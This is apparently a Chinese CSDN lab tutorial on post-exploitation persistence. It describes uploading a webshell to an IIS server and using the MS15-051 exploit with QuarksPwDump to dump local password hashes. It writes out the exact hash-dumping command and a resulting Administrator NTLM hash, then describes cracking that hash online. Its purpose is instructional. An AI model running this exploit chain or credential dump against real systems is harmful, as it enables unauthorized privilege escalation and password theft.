后渗透——权限维持之获取系统管理员administrator密码

什么是权限维持
当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。
由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的。

在这里插入图片描述

实验环境:

在这里插入图片描述

环境搭建:

开启IIS服务器,写入一句话木马使物理机能够访问
在这里插入图片描述
菜刀连接找到C:\Windows\Temp\目录,将MS15-051的exp和QuarksPwDump.exe上传
在这里插入图片描述

在这里插入图片描述

模拟实验:

在菜刀终端输入C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\QuarksPwDump.exe --dump-hash-local"获取到Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942:::在这里插入图片描述
然后复制最后面的密文AFFFEBA176210FAD4628F0524BFE1942在CMD5网站解密,成功拿到Administrator密码
在这里插入图片描述

©️2020 CSDN 皮肤主题: 编程工作室 设计师: CSDN官方博客 返回首页
实付0元
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值